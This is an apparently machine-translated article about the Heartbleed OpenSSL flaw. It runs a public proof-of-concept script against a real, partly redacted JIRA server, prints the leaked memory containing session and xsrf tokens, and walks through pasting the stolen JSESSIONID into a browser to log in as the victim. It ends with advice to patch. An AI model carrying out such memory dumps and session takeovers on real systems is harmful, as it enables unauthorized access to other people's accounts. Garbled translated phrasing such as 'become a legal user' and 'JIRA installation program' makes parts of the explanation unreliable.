Use the Heartbleed vulnerability to hijack user logon sessions

The Heartbleed problem is actually worse than it can be seen now (it seems to be broken now ). Heartbleed (CVE-2014-0160) is an OpenSSL vulnerability that allows any remote user to dump some of the server's memory. Yes, it's really bad. It is worth noting that a skilled user can use it to dump the RSA private key used by the server to communicate with the customer through a process. The level of knowledge/skills required to initiate such attacks is not very high, but may exceed the average level of junior users of the script. So why is Heartbleed worse than you think? This is simple: currently, the script of conceptual evidence is available to allow any client to perform session hijacking attacks on User Logon anywhere in the world. The conceptual proof that was most widely shared this morning was such a simple Python script: https://gist.github.com/takeshixx/10107280. With this script, anyone in the world can dump part of the memory from a vulnerable server. Let's take a look at the output of this tool (for vulnerable servers running JIRA's ticket tracking system. To improve readability, the hexadecimal output has been deleted.

[matt@laptop ~]# python heartbleed.py jira.XXXXXXXXXXX.com Connecting... Sending Client Hello... Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 3239 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384 Received heartbeat response:.@..GET /browse/ en_US-cubysj-198 8229788/6160/11/(lots of garbage)..............Ac cept-Encoding: g zip,deflate,sdch ..Accept-Languag e: en-US,en;q=0. 8..Cookie: atlas sian.xsrf.token= BWEK-0C0G-BSN7-V OZ1|3d6d84686dc0 f214d0df1779cbe9 4db6047b0ae5|lou t; JSESSIONID=33 F4094F68826284D1 8AA6D7ED1D554E.. ..E.$3Z.l8.M..e5 ..6D7ED1D554E... ......*..?.e.b..WARNING: server returned more data than it should - server is vulnerable!

 

This must be a dump of the memory generated by the last GET request. Have you noticed the above JSESSIONID Cookie? This is the method that JIRA uses to track your HTTP session to determine whether you have logged on. If this system requires verification (like JIRA installation), I can insert this cookie into my browser and become a legal user of this JIRA installation program. Insert the session ID cookie into the browser ). after saving the modified cookie, refresh the browser. reload and install JIRA. note: We are now logged on to the installer. as shown above, once we get a valid session ID cookie, we can access JIRA installation as an internal employee. the only way to detect this type of attack is to check the source address of each request communication. This Heartbleed vulnerability is terrible, and almost nothing is done to prevent remote attackers from executing a session hijacking attack that allows bypass authentication. Patch your system immediately.